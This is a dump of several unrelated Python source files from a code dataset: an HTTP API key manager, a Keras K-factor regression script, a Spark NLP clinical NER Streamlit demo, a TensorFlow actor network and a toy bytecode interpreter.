@httppath('/./delApiPath')\n    def delApiPath(self, path):\n        '''\n        Delete an API path from the HttpApi.\n        '''\n        with self.jslock:\n            self.pathmeths.pop(path,None)\n            self.jsinfo['apipaths'].pop(path,None)\n            self._saveJsInfo()\n\n    def callApiPath(self, apikey, path, *args, **kwargs):\n        '''\n        Call the given API and return a dict of ret/exc.\n        '''\n        ret = {}\n        start = time.time()\n\n        try:\n            ret['ret'] = self.pathmeths.get(path)(*args,**kwargs)\n        except Exception as e:\n            ret['err'] = e.__class__.__name__\n            ret['msg'] = str(e)\n\n        ret['took'] = time.time() - start\n        return ret\n\n    @httppath('/./getApiKeyInfo')\n    def getApiKeyInfo(self, apikey, prop):\n        '''\n        Return an api key property.\n\n        Example:\n\n            if api.getApiKeyInfo(apikey,'en'):\n                print('enabled!')\n\n        '''\n        info = self._reqApiKey(apikey)\n        return info.get(prop)\n\n    @httppath('/./setApiKeyInfo')\n    def setApiKeyInfo(self, apikey, prop, valu):\n        '''\n        Set an api key property (and save).\n\n        Example:\n\n            api.setApiKeyInfo(apikey, 'en', False)\n\n        '''\n        with self.jslock:\n            info = self._reqApiKey(apikey)\n            info[prop] = valu\n\n            self.rulecache.clear()\n            self._saveJsInfo()\n\n    @httppath('/./getRoleInfo')\n    def getRoleInfo(self, role, prop):\n        '''\n        Return a role property.\n\n        Example:\n\n            if api.getRoleInfo(role, 'en'):\n                print('enabled!')\n\n        '''\n        info = self._reqRole(role)\n        return info.get(prop)\n\n    
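# Illustrative usage sketch (added for clarity; the names below are\n    # hypothetical, not taken from this module's callers). Allow rules are\n    # fnmatch globs which getApiKeyAllow() resolves from per-key rules first\n    # and then from role rules:\n    #\n    #     api = HttpApi()\n    #     api.addRole('reader')\n    #     api.addRoleAllow('reader', '/v1/*')\n    #     api.addApiKey('somekey', name='visi')\n    #     api.addApiKeyRole('somekey', 'reader')\n    #     api.getApiKeyAllow('somekey', '/v1/foo') # -> {'rate': None}\n\n    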
@httppath('/./setRoleInfo')\n def setRoleInfo(self, role, prop, valu):\n '''\n Set a role property (and save).\n\n Example:\n\n api.setRoleInfo(role, 'en', False)\n\n '''\n with self.jslock:\n info = self._reqRole(role)\n info[prop] = valu\n\n self.rulecache.clear()\n self._saveJsInfo()\n\n def _loadApiPath(self, path, objname, methname):\n obj = self.objs.get(objname)\n if obj == None:\n raise NoSuchApiObj(objname)\n\n meth = getattr(obj,methname,None)\n if meth == None:\n raise NoSuchApiMeth(methname)\n\n self.pathmeths[path] = meth\n\nclass HttpCallError(Exception):\n def __init__(self, retinfo):\n self.retinfo = retinfo\n err = retinfo.get('err')\n msg = retinfo.get('msg')\n Exception.__init__(self, '%s: %s' % (err,msg))\n\nclass HttpApiMeth:\n def __init__(self, url, apikey=None):\n self.url = url\n self.apikey = apikey\n self.headers = {}\n\n if self.apikey != None:\n self.headers['apikey'] = apikey\n\n def __call__(self, *args, **kwargs):\n data = json.dumps({'args':args,'kwargs':kwargs})\n reply = requests.post(self.url, headers=self.headers, data=data)\n retinfo = reply.json()\n if retinfo.get('err') != None:\n raise HttpCallError(retinfo)\n\n return retinfo.get('ret')\n\nclass HttpApiProxy:\n '''\n Pythonic HTTP API proxy which allows \"object like\" calling.\n\n Example:\n\n api = HttpApiProxy('https://kenshoto.com/v1/context', apikey=mykey)\n\n x = api.getfoo('woot')\n\n '''\n def __init__(self, url, apikey=None):\n self.url = url\n self.apikey = apikey\n self.apicache = {}\n\n def __getattr__(self, name):\n meth = self.apicache.get(name)\n if meth != None:\n return meth\n\n if not self.url.endswith('/'):\n name = '/' + name\n\n meth = HttpApiMeth(self.url + name, apikey=self.apikey)\n self.apicache[name] = meth\n return meth\n","sub_path":"synapse/httpapi.py","file_name":"httpapi.py","file_ext":"py","file_size_in_byte":18664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"330763781","text":"# ANN for nn 11\r\n\r\n# Importing libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\r\nfrom keras.layers.core import Dense, Activation, Dropout\r\nfrom keras.callbacks import History, ModelCheckpoint, EarlyStopping\r\nfrom keras import initializers\r\nfrom keras.optimizers import Adam, Adadelta, SGD, RMSprop\r\nimport time\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n# Defining features\r\nnames = ['i','m1','m2','M1','M2','Mu','TanB','Z','MW','h0','H0','A0','H_plus','g','nino_1','nino_2','cino_1','nino_3','nino_4','cino_2','d_L','u_L','s_L','c_L','t_1','b_1','e_L','nue_L','mu_L','numu_L','stau_1','nu_tau_L','d_R','u_R','s_R','c_R','t_2','b_2','e_R','mu_R','stau_2','u11','u12','u21','u22','v11','v12','v21','v22','lo','nlo','K']\r\ndataset = pd.read_csv('all_param12.dat',delim_whitespace=True,names=names)\r\n\r\nX1 = ( abs(dataset.iloc[4256:, [18]].values) + dataset.iloc[4256:, [1]].values)/2\r\nX2 = ( abs(dataset.iloc[4256:, [17]].values) + dataset.iloc[4256:, [2]].values)/2\r\nX3 = (dataset.iloc[4256:, [16]].values + dataset.iloc[4256:, [19]].values )/2\r\nX4 = (dataset.iloc[4256:, [41]].values + abs(dataset.iloc[4256:, [42]].values) + dataset.iloc[4256:, [43]].values + dataset.iloc[4256:, [44]].values )/4\r\nX5 = np.asarray( dataset.iloc[4256:, [45]].values )\r\nX6 = 
np.asarray( dataset.iloc[4256:, [47]].values )\r\nX7 = np.asarray(dataset.iloc[4256:, [49]].values)\r\nc1 = np.max(abs(np.log(X7)))\r\nX7 = np.max(abs(np.log(X7))) + np.log(X7)\r\n\r\n# xsec nlo (NOT USED FOR TRAINING!!)\r\nX8 = np.asarray(dataset.iloc[4256:, [50]].values)\r\nc2 = np.max(abs(np.log(X8)))\r\nX8 = np.max(abs(np.log(X8))) + np.log(X8)\r\n\r\n# Defining the dataset\r\nX = np.asarray([X1,X2,X3,X4,X5,X6,X7,X8])\r\nX = X[:, :, -1]\r\nX = np.transpose(X)\r\ny = dataset.iloc[4256:, 51].values\r\n\r\n# Function to calculate mean absolute percentage error\r\ndef err(actual, predicted):\r\n return actual - predicted\r\n\r\ndef percentage_err(actual, predicted):\r\n return err(actual, predicted) / (actual)\r\n\r\ndef mape(actual, predicted):\r\n return np.mean(np.abs(percentage_err(actual, predicted)))\r\n\r\n# Peformance and accuracy testing\r\nSplit = [0.05,0.10,0.15,0.20,0.25,0.30,0.35,0.40,0.45,0.50]\r\ntest = open(\"NN_test_12\",\"w+\")\r\nfor i in Split:\r\n # Splitting the dataset into training and test set\r\n start = time.time()\r\n X_train, X_test, y_train, y_test = train_test_split(X,y, test_size = i, random_state = 21)\r\n\r\n # Seperate nlo xsec from test set\r\n Xsec_lo_test = X_test[:,6]\r\n Xsec_nlo_test = X_test[:,7]\r\n X_test = X_test[:,0:7]\r\n X_train = X_train[:,0:7]\r\n \r\n # Feature Scaling\r\n sc_X = StandardScaler()\r\n X_train = sc_X.fit_transform(X_train)\r\n X_test = sc_X.transform(X_test)\r\n \r\n # Initialising the ANN\r\n classifier = Sequential()\r\n\r\n model=Sequential()\r\n for j in range(0,8):\r\n model.add(Dense(32, kernel_initializer=initializers.random_normal(mean=0.0, stddev=0.176177), input_dim=7))\r\n model.add(Activation('selu'))\r\n model.add(Dense(1, init='uniform',activation='linear'))\r\n\r\n history = History()\r\n checkpointer = ModelCheckpoint(filepath=\"K-factor_12.hdf5\", verbose=1, save_best_only=True)\r\n early_stopping = EarlyStopping(monitor='val_loss', patience=50)\r\n \r\n log=open(\"K-factor_12.txt\", \"w\")\r\n learnrate=0.0008\r\n pat=50\r\n iterations = 7\r\n epochs = 250\r\n batch_size = 120\r\n c_lr = 2\r\n lr_limit=learnrate/(c_lr**iterations)\r\n k=0\r\n while learnrate > lr_limit:\r\n early_stopping = EarlyStopping(monitor='val_loss', patience=pat)\r\n opt = Adam(lr=learnrate, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)\r\n checkpointer = ModelCheckpoint(filepath='K-factor_12' + str(k) + '.hdf5', verbose=1, save_best_only=True)\r\n model.compile(loss=\"mape\", optimizer=opt)\r\n model.fit(X_train, y_train, validation_data=(X_test,y_test), nb_epoch=epochs, batch_size=batch_size, verbose=2, callbacks=[history,checkpointer,early_stopping])\r\n model.load_weights('K-factor_12' + str(k) + '.hdf5')\r\n learnrate /= c_lr\r\n k=k+1\r\n \r\n # This is how you use your net to predict stuff. 
Here I predict the test points.\r\n y_pred = model.predict(X_test)\r\n X_pred = model.predict(X_train)\r\n \r\n # Calculate and save execution time and accuracy\r\n results = np.array([[learnrate],[k],[mape(y_test,y_pred)]])\r\n np.savetxt(log,np.transpose(results),delimiter=' ')\r\n print(np.transpose(results))\r\n \r\n # Scale back features\r\n X_test = sc_X.inverse_transform(X_test)\r\n X_train = sc_X.inverse_transform(X_train)\r\n y_test = y_test.reshape(y_pred.shape)\r\n # Calculate and save execution time and accuracy\r\n end = time.time()\r\n total = end - start\r\n final_results = np.array([[total],[i],[mape(y_test,y_pred)]])\r\n np.savetxt(test,np.transpose(final_results),delimiter=' ')\r\n print(np.transpose(final_results))\r\n log.close()\r\n \r\n # True vs Predicted values for K-factor\r\n plt.tight_layout()\r\n ideal = np.arange(np.min(0.95), np.max(1.475), 0.005)\r\n fig3=plt.figure(figsize=(10, 10))\r\n plt.title('True vs. predicted K-factor for ANN',fontsize=16)\r\n plt.xlim(0.95,1.475)\r\n plt.ylim(0.95,1.475)\r\n plt.xlabel('K-factor',fontsize=16)\r\n plt.ylabel('Predicted K-factor',fontsize=16)\r\n plt.plot(y_test, y_pred,'ro', ideal, ideal, 'r--',color ='blue',lw=2,alpha=0.7)\r\n a = plt.axes([.625, .15, .25, .2], facecolor='w')\r\n errhist = y_test - y_pred\r\n plt.hist(errhist, range=[-0.15, 0.15], bins=100, density=True,edgecolor = 'black', alpha=0.75,color='b' )\r\n plt.xlim(-0.15,0.15,0.1)\r\n plt.yticks([])\r\n plt.title('Error distribution')\r\n plt.savefig(str(i)+\"NNK_12.png\",bbox_inches='tight',dpi=300)\r\n plt.close()\r\n \r\n # Calculate nlo xsec\r\n Xsec_lo_test = np.exp(Xsec_lo_test - c1)\r\n Xsec_lo_test = Xsec_lo_test.reshape(y_pred.shape)\r\n Xsec_nlo_test = np.exp(Xsec_nlo_test - c2)\r\n Xsec_nlo_test = Xsec_nlo_test.reshape(y_pred.shape)\r\n Xsec_nlo_pred = y_pred*Xsec_lo_test\r\n \r\n # True vs Predicted values for xsec\r\n plt.tight_layout()\r\n ideal = np.arange(np.min(Xsec_nlo_test), np.max(Xsec_nlo_pred), 0.005)\r\n fig3=plt.figure(figsize=(10, 10))\r\n plt.title('True vs. predicted NLO xsec for ANN',fontsize=16)\r\n plt.xlabel('$\\sigma_{nlo}$ [pb]',fontsize=16)\r\n plt.ylabel('Predicted $\\sigma_{nlo}$ [pb]',fontsize=16)\r\n plt.yscale('log')\r\n plt.xscale('log')\r\n plt.plot(Xsec_nlo_test, Xsec_nlo_pred,'ro', ideal, ideal, 'r--',color ='blue',lw=2,alpha=0.7)\r\n a = plt.axes([.625, .15, .25, .2], facecolor='w')\r\n errhist = Xsec_nlo_test - Xsec_nlo_pred\r\n plt.hist(errhist, range=[-0.005, 0.005], bins=100, density=True,edgecolor = 'black', alpha=0.75,color='b' )\r\n plt.xlim(-0.005,0.005,2)\r\n plt.yticks([])\r\n plt.title('Error distribution')\r\n plt.savefig(str(i)+\"NN_xsec_12.png\",bbox_inches='tight',dpi=300)\r\n plt.close()\r\n \r\n # Relative error\r\n rel_error = (Xsec_nlo_pred - Xsec_nlo_test)/Xsec_nlo_test\r\n plt.tight_layout()\r\n fig3=plt.figure(figsize=(10, 10))\r\n plt.title('Relative error vs. 
predicted NLO xsec for ANN',fontsize=16)\r\n plt.xlabel('$\\sigma_{nlo}$ [pb]',fontsize=16)\r\n plt.ylabel('Relative error',fontsize=16)\r\n plt.ylim(np.min(Xsec_nlo_test),np.max(Xsec_nlo_test))\r\n plt.yscale('log')\r\n plt.xscale('log')\r\n plt.scatter(Xsec_nlo_test,rel_error,alpha=0.7,color='g')\r\n plt.savefig(str(i)+\"NN_xsec_rel_12.png\",bbox_inches='tight',dpi=300)\r\n plt.close()\r\n \r\n # Fit results\r\n plt.tight_layout()\r\n plt.scatter((X_train[:, 0]),(y_train),c='green',alpha=0.4,s=6)\r\n plt.plot((X_test[:, 0]),(y_pred),c='black',alpha=1.0,zorder=20)\r\n plt.xlabel(\"Z\",fontsize=12)\r\n plt.ylabel(\"K-factor\",fontsize=12)\r\n plt.savefig(str(i)+\"NN_12.png\",bbox_inches='tight',dpi=300)\r\n plt.show()\r\n plt.close()\r\n\r\ntest.close()","sub_path":"ANN_K-factor__12.py","file_name":"ANN_K-factor__12.py","file_ext":"py","file_size_in_byte":8426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"499526029","text":"\nimport streamlit as st\nimport pandas as pd\nimport base64\n\nfrom sparknlp_display import NerVisualizer\n\nst.sidebar.image('https://nlp.johnsnowlabs.com/assets/images/logo.png', use_column_width=True)\n\nHTML_WRAPPER = \"\"\"
<div style=\"overflow-x: auto; border: 1px solid #e6e9ef; border-radius: 0.25rem; padding: 1rem; margin-bottom: 2.5rem\">{}</div>
\"\"\"\n\nst.title(\"Spark NLP Clinical NER Playground\")\n\nimport json\nimport os\nfrom pyspark.ml import Pipeline,PipelineModel\nfrom pyspark.sql import SparkSession\n\nfrom sparknlp.annotator import *\nfrom sparknlp_jsl.annotator import *\nfrom sparknlp.base import *\nimport sparknlp_jsl\nimport sparknlp\n\n\nimport json\n\nspark = sparknlp_jsl.start(os.environ['SECRET'])\n\nprint (\"Spark NLP Version :\", sparknlp.version())\nprint (\"Spark NLP_JSL Version :\", sparknlp_jsl.version())\n\n\n@st.cache(allow_output_mutation=True, suppress_st_warning=True)\ndef load_sparknlp_models():\n\n print ('loading pretrained models')\n\n sentenceDetector = SentenceDetectorDLModel.pretrained(\"sentence_detector_dl_healthcare\",\"en\",\"clinical/models\")\\\n .setInputCols([\"document\"])\\\n .setOutputCol(\"sentence\")\n\n embeddings_clinical = WordEmbeddingsModel.pretrained(\"embeddings_clinical\",\"en\",\"clinical/models\")\\\n .setInputCols([\"sentence\",\"token\"])\\\n .setOutputCol(\"embeddings\")\n\n model_dict = {\n 'sentenceDetector': sentenceDetector,\n 'embeddings_clinical':embeddings_clinical\n }\n \n for ner_model in ner_models_clinical:\n\n try:\n model_dict[ner_model] = MedicalNerModel.pretrained(ner_model,\"en\",\"clinical/models\")\\\n .setInputCols([\"sentence\",\"token\",\"embeddings\"])\\\n .setOutputCol(\"ner\")\n except:\n pass\n #st.write ('model name is wrong > ', ner_model)\n\n print ('models loaded !')\n\n return model_dict\n\n@st.cache(allow_output_mutation=True, suppress_st_warning=True)\ndef load_sparknlp_models_biobert():\n\n print ('loading pretrained models')\n\n sentenceDetector = SentenceDetectorDLModel.pretrained(\"sentence_detector_dl_healthcare\",\"en\",\"clinical/models\")\\\n .setInputCols([\"document\"])\\\n .setOutputCol(\"sentence\")\n\n embeddings_biobert = BertEmbeddings.pretrained(\"biobert_pubmed_base_cased\").setInputCols([\"sentence\", \"token\"]).setOutputCol(\"embeddings\")\n\n model_dict = {\n 'sentenceDetector': sentenceDetector,\n 'embeddings_biobert':embeddings_biobert\n }\n \n for ner_model in ner_models_biobert :\n\n try:\n model_dict[ner_model] = MedicalNerModel.pretrained(ner_model,\"en\",\"clinical/models\")\\\n .setInputCols([\"sentence\",\"token\",\"embeddings\"])\\\n .setOutputCol(\"ner\")\n except:\n pass\n #st.write ('model name is wrong > ', ner_model)\n\n print ('models loaded !')\n\n return model_dict\n\nimport subprocess\n\nsubprocess.run([\"wget\", \"https://nlp.johnsnowlabs.com/models.json\"])\n\nwith open('/content/models.json') as f:\n model_master_list = json.load(f)\n\nner_models_biobert = list(set([x['name'] for x in model_master_list if x['task']==\"Named Entity Recognition\" and x['edition'].startswith('Spark NLP for Healthcare') and 'biobert' in x['name'] and x['edition'].split()[-1]>='3.0']))\nner_models_clinical = list(set([x['name'] for x in model_master_list if x['task']==\"Named Entity Recognition\" and x['edition'].startswith('Spark NLP for Healthcare') and 'biobert' not in x['name'] and 'healthcare' not in x['name'] and x['edition'].split()[-1]>='3.0']))\n\n\nmodel_dict_1 = load_sparknlp_models()\nmodel_dict_2 = load_sparknlp_models_biobert()\n\n\nif not st.sidebar.checkbox('with BioBert Embeddings'):\n emb = 'clinical'\n model_dict = model_dict_1\nelse:\n model_dict = model_dict_2\n emb = 'biobert'\n\n\ndef display_time(start_tm):\n end_tm = time.time()\n diff = end_tm - start_tm\n st.write('{} sec'.format(round(diff,4)), unsafe_allow_html=True)\n\n\ndef viz (annotated_text, chunk_col):\n\n raw_html = 
NerVisualizer().display(annotated_text, chunk_col, return_html=True)\n    sti = raw_html.find('<style>')\n    ste = raw_html.find('</style>')+8\n    st.markdown(raw_html[sti:ste], unsafe_allow_html=True)\n\n    st.write(HTML_WRAPPER.format(raw_html[ste:]), unsafe_allow_html=True)\n\n\ndef get_table_download_link(df):\n    \n    \"\"\"Generates a link allowing the data in a given pandas dataframe to be downloaded\n    in: dataframe\n    out: href string\n    \"\"\"\n    csv = df.to_csv(index=False)\n    b64 = base64.b64encode(csv.encode()).decode() # some strings <-> bytes conversions necessary here\n    href = f'<a href=\"data:file/csv;base64,{b64}\">Download table as csv file</a>'\n    st.write('')\n    st.markdown(href, unsafe_allow_html=True)\n\n\n\ndef build_dynamic_pipeline(payload, embeddings_name='embeddings_clinical'):\n    \n    document = DocumentAssembler()\\\n        .setInputCol(\"text\")\\\n        .setOutputCol(\"document\")\n\n    sentence = model_dict['sentenceDetector']\n\n    token = Tokenizer()\\\n        .setInputCols(['sentence'])\\\n        .setOutputCol('token')\n    \n    embeddings = model_dict[embeddings_name]\n\n    st.write()\n\n    ner_pipe = []\n\n    for ner, entities in payload.items():\n        \n        first = len(ner_pipe) == 0\n        \n        ner_pipe.append(model_dict[ner]\\\n            .setInputCols([\"sentence\", \"token\", \"embeddings\"]) \\\n            .setOutputCol(\"{}_tags\".format(ner))\n        )\n\n        ner_pipe.append(NerConverter()\\\n            .setInputCols([\"sentence\", \"token\", \"{}_tags\".format(ner)])\\\n            .setOutputCol(\"{}_chunks\".format(ner))\\\n            .setWhiteList(entities)\n        )\n        \n        if not first:\n            \n            ner_pipe.append(ChunkMergeApproach().setInputCols(prev, \"{}_chunks\".format(ner)).\\\n                setOutputCol(\"{}_chunks\".format(ner)))\n            \n            \n        prev = \"{}_chunks\".format(ner)\n\n    ner_pipeline = Pipeline(\n        stages = [\n            document,\n            sentence,\n            token,\n            embeddings]+ner_pipe)\n    \n    return ner_pipeline, prev\n    \nst.sidebar.header('Select pretrained NER Model(s)')\n\nst.sidebar.write('')\n\ndef get_labels(model):\n    \n    m = set(list([c.split('-')[1] for c in model.getClasses() if len(c)>1]))\n    \n    return list(m)\n\ndef get_payload():\n    \n    ner_list = [i for i in model_dict.keys() if 'ner' in i]\n    \n    ner_payload = dict()\n    \n    for ner in ner_list:\n        \n        if ner=='clinical_ner':\n            \n            st.sidebar.checkbox(ner, value=True)\n            \n        if st.sidebar.checkbox(ner):\n\n            classes = get_labels(model_dict[ner])\n\n            concepts = st.sidebar.multiselect(\"entities in {}\".format(ner), options=classes, default=classes)\n\n            ner_payload[ner] = concepts\n    \n    return ner_payload\n\nfrom sparknlp_display import NerVisualizer\n\n\ndef get_entities (ner_pipeline, text):\n    \n    empty_data = spark.createDataFrame([[\"\"]]).toDF(\"text\")\n\n    ner_model = ner_pipeline.fit(empty_data)\n\n    light_model = LightPipeline(ner_model)\n\n    full_annotated_text = light_model.fullAnnotate(text)[0]\n\n    st.write('')\n    st.subheader('Entities')\n\n    chunks=[]\n    entities=[]\n    \n    for n in full_annotated_text[chunk_col]:\n\n        chunks.append(n.result)\n        entities.append(n.metadata['entity'])\n\n    df = pd.DataFrame({'chunks':chunks, 'entities':entities})\n\n    #show_html_spacy(full_annotated_text, chunk_col)\n\n    viz (full_annotated_text, chunk_col)\n    \n    st.table(df)\n    \n    return df\n\n\nner_list = [i for i in model_dict.keys() if 'ner' in i.lower()]\n\nner_list = sorted(ner_list)\n\nif st.sidebar.checkbox('Run all NERs'):\n    \n    st.sidebar.markdown(\"---\")\n    \n    ner_payload = dict()\n\n    concepts = []\n    \n    for ner in ner_list:\n\n        classes = get_labels(model_dict[ner])\n\n        ner_concepts = st.sidebar.multiselect(\"entities in {}\".format(ner), options=classes, default=classes)\n\n        ner_payload[ner] = ner_concepts\n        \n        concepts.extend(ner_concepts)\n\nelse:\n    \n    ner_payload = 
dict()\n\n for ner in ner_list:\n\n if st.sidebar.checkbox(ner):\n\n classes = get_labels(model_dict[ner])\n\n ner_concepts = st.sidebar.multiselect(\"entities in {}\".format(ner), options=classes, default=classes)\n\n ner_payload[ner] = ner_concepts\n\n\nner_text = st.text_area('NER Input Text', 'A 28-year-old female with a history of gestational diabetes mellitus diagnosed eight years prior to presentation and subsequent type two diabetes mellitus ( T2DM ), one prior episode of HTG-induced pancreatitis three years prior to presentation , associated with an acute hepatitis , and obesity with a body mass index ( BMI ) of 33.5 kg/m2 , presented with a one-week history of polyuria , polydipsia , poor appetite , and vomiting. The patient was prescribed 1 capsule of Advil 10 mg for 5 days and magnesium hydroxide 100mg/1ml suspension PO. He was seen by the endocrinology service and she was discharged on 40 units of insulin glargine at night , 12 units of insulin lispro with meals , and metformin 1000 mg two times a day .')\n\nimport time\n\nstart_time = time.time()\n\nif len(ner_payload)!=0:\n \n st.header(\"***chunks will be merged if multiple models selected***\")\n \n if emb=='clinical':\n ner_pipeline, chunk_col = build_dynamic_pipeline (ner_payload)\n else:\n ner_pipeline, chunk_col = build_dynamic_pipeline (ner_payload, embeddings_name='embeddings_biobert')\n\n entities_df = get_entities (ner_pipeline, ner_text)\n \n get_table_download_link(entities_df )\n\n display_time(start_time)\n \n \n# how to run\n# streamlit run sparknlp_ner_playground.py\n","sub_path":"tutorials/streamlit_notebooks/healthcare/sparknlp_ner_playground.py","file_name":"sparknlp_ner_playground.py","file_ext":"py","file_size_in_byte":9739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"319962635","text":"import tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport numpy as np\nimport time\n\n\nclass Actor:\n \"\"\"Actor (Policy) Model.\"\"\"\n\n def __init__(self, state_size, action_size, action_low, action_high,single_rotor_control = False,hidden_size=128,\n is_training=True):\n \"\"\"Initialize parameters for the actor.\n\n Params\n ======\n state_size (int): Dimension of each state\n action_size (int): Dimension of each action\n action_low (array): Min value of each action dimension\n action_high (array): Max value of each action dimension\n \"\"\"\n self.state_size = state_size\n self.single_rotor_control = single_rotor_control\n \n self.action_size = action_size\n self.action_low = action_low\n self.action_high = action_high\n self.action_range = self.action_high - self.action_low\n self.num_hidden = hidden_size\n self.is_training = is_training\n self.build_model()\n \n def inputs(self):\n with tf.name_scope('actor_inputs'):\n inp_state = tf.placeholder(tf.float32,[None,self.state_size],name='state')\n action_gradients = tf.placeholder(tf.float32,[None,self.action_size],name='action_gradients')\n #is_training = tf.placeholder(tf.bool,name=\"is_training\")\n # placeholder for mask used in weighted experience replay\n #replay_buffer_mask = tf.placeholder(tf.float32,[None],name=\"replay_buffer_mask\")\n return inp_state,action_gradients#,is_training#,replay_buffer_mask\n \n def model(self,inp_state,scope='actor_model'):\n with tf.variable_scope(scope):\n batch_norm_params = {'is_training': self.is_training}\n net = slim.fully_connected(inp_state,self.num_hidden,normalizer_fn=slim.batch_norm,normalizer_params = batch_norm_params,\n 
weights_regularizer=slim.l2_regularizer(0.0),scope='fc1') # (N,num_hidden)\n net = slim.dropout(net,keep_prob=.1,is_training=self.is_training)\n #net = slim.batch_norm(net,is_training=self.is_training)\n net = slim.fully_connected(net,self.num_hidden,#normalizer_fn=slim.batch_norm,normalizer_params = batch_norm_params,\n weights_regularizer=slim.l2_regularizer(0.0),scope='fc2') # (N,num_hidden)\n net = slim.dropout(net,keep_prob=.1,is_training=self.is_training)\n net = slim.fully_connected(net,self.num_hidden,normalizer_fn=slim.batch_norm,normalizer_params = batch_norm_params,\n weights_regularizer=slim.l2_regularizer(0.0),scope='fc3') # (N,num_hidden)\n net = slim.dropout(net,keep_prob=.1,is_training=self.is_training)\n #net = slim.batch_norm(net,is_training=self.is_training)\n if self.single_rotor_control:\n net = slim.fully_connected(net,1,activation_fn=tf.sigmoid,scope='fc4') # (N,1)\n mask = tf.ones([1,self.action_size])\n net = tf.multiply(net,mask) #(N,action_size)\n else:\n net = slim.fully_connected(net,self.action_size,activation_fn=tf.sigmoid,scope='fc4') # (N,action_size)\n net = tf.multiply(net,self.action_range) + self.action_low # map from [0,1] to action ranges\n return net\n \n def loss(self,actions,action_gradients,replay_buffer_mask=None):\n with tf.name_scope('actor_loss'):\n actor_loss = tf.reduce_mean(-actions*action_gradients)\n return actor_loss\n \n def optimizer(self,loss,learning_rate=1e-4):\n with tf.name_scope('actor_optimizer'):\n #train_op = tf.train.AdamOptimizer(learning_rate)#.minimize(loss)\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n gradients, variables = zip(*optimizer.compute_gradients(loss))\n gradients, _ = tf.clip_by_global_norm(gradients, 1.0)\n train_op = optimizer.apply_gradients(zip(gradients, variables))\n return train_op\n \n def build_model(self):\n self.inp_state,self.action_gradients = self.inputs()\n self.actions = self.model(self.inp_state)\n self.actor_loss = self.loss(self.actions,self.action_gradients)\n self.opt = self.optimizer(self.actor_loss)","sub_path":"agents/actor.py","file_name":"actor.py","file_ext":"py","file_size_in_byte":4333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"98093761","text":"import dis\r\nimport sys\r\nimport operator\r\n\r\n\r\nclass Stack(object):\r\n def __init__(self):\r\n self.values = []\r\n\r\n def push(self, elem):\r\n self.values.append(elem)\r\n\r\n def pop(self):\r\n return self.values.pop()\r\n\r\n def top(self):\r\n return self.values[-1]\r\n\r\n def popn(self, n):\r\n toplist = []\r\n for elem_number in range(n):\r\n toplist.append(self.pop())\r\n return tuple(toplist[::-1])\r\n\r\n def deep_top(self, depth):\r\n return self.values[-depth]\r\n\r\n\r\nclass Instruction(object):\r\n def __init__(self, _opcode, _opname, _arg):\r\n self.opcode = _opcode\r\n self.opname = _opname\r\n self.arg = _arg\r\n\r\n\r\nclass Function(object):\r\n def __init__(self, _name, _code, _default_args):\r\n self.name = _name\r\n self.code = _code\r\n self.default_args = _default_args\r\n\r\n def __call__(self, *args, **kwargs):\r\n vm = VirtualMachine()\r\n merged_args = list(args) + list(self.default_args)\r\n return vm.run_code(self.code, *merged_args, **kwargs)\r\n\r\n\r\nclass VirtualMachine(object):\r\n def __init__(self):\r\n self.stack = Stack()\r\n self.values = []\r\n self.instr_dict = {}\r\n self.blocks = Stack()\r\n self.varnames = []\r\n self.varvalues = []\r\n\r\n def parse_argument(self, arg):\r\n high_arg = arg // 256\r\n 
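# In the pre-3.6 CPython bytecode this VM targets (3-byte instructions),\r\n        # opargs such as CALL_FUNCTION's pack two counts into one 16-bit value:\r\n        # the low byte counts positional arguments and the high byte counts\r\n        # keyword pairs; this split recovers both.\r\n        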
low_arg = arg % 256\r\n\r\n return high_arg, low_arg\r\n\r\n def parse_instructions(self, code_object):\r\n for instr in dis.get_instructions(code_object):\r\n self.instr_dict[instr.offset] = Instruction(\r\n instr.opcode,\r\n instr.opname,\r\n instr.arg\r\n )\r\n\r\n def run_code(self, code_object, *external_args, **external_kwargs):\r\n self.names = code_object.co_names\r\n self.consts = code_object.co_consts\r\n self.varnames = code_object.co_varnames\r\n\r\n tail_len = len(self.varnames) - len(external_args)\r\n self.varvalues = list(external_args) + tail_len * [None]\r\n\r\n for key, value in external_kwargs.items():\r\n for varname_ind in range(len(self.varnames)):\r\n if self.varnames[varname_ind] == key:\r\n self.varvalues[varname_ind] = value\r\n break\r\n\r\n for name in self.names:\r\n if name in dir(globals()['__builtins__']):\r\n func = getattr(globals()['__builtins__'], name)\r\n self.values.append(func)\r\n else:\r\n self.values.append(name)\r\n\r\n self.parse_instructions(code_object)\r\n self.instr_offset = 0\r\n while self.instr_offset in self.instr_dict:\r\n current_instr = self.instr_dict[self.instr_offset]\r\n\r\n # dangerous!!!\r\n if current_instr.opname == 'RETURN_VALUE':\r\n return self.stack.pop()\r\n\r\n self.exec_instruction(current_instr)\r\n if current_instr.opcode >= dis.HAVE_ARGUMENT:\r\n self.instr_offset += 3\r\n else:\r\n self.instr_offset += 1\r\n\r\n def exec_instruction(self, instr):\r\n\r\n if instr.opname in self.UNARY_OP_DICT:\r\n self.unary_operation(instr.opname)\r\n\r\n elif instr.opname in self.BINARY_OP_DICT:\r\n self.binary_operation(instr.opname)\r\n\r\n elif instr.opname in self.INPLACE_OP_DICT:\r\n self.inplace_operation(instr.opname)\r\n\r\n elif instr.opcode < dis.HAVE_ARGUMENT:\r\n try:\r\n getattr(self, instr.opname)()\r\n except:\r\n # print('Not implemented: {}'.format(instr.opname))\r\n pass\r\n\r\n elif instr.opcode >= dis.HAVE_ARGUMENT:\r\n try:\r\n getattr(self, instr.opname)(instr.arg)\r\n except:\r\n # print('Not implemented with args: {}'.format(instr.opname))\r\n pass\r\n\r\n# main\r\n def LOAD_CONST(self, number):\r\n self.stack.push(self.consts[number])\r\n\r\n def STORE_NAME(self, 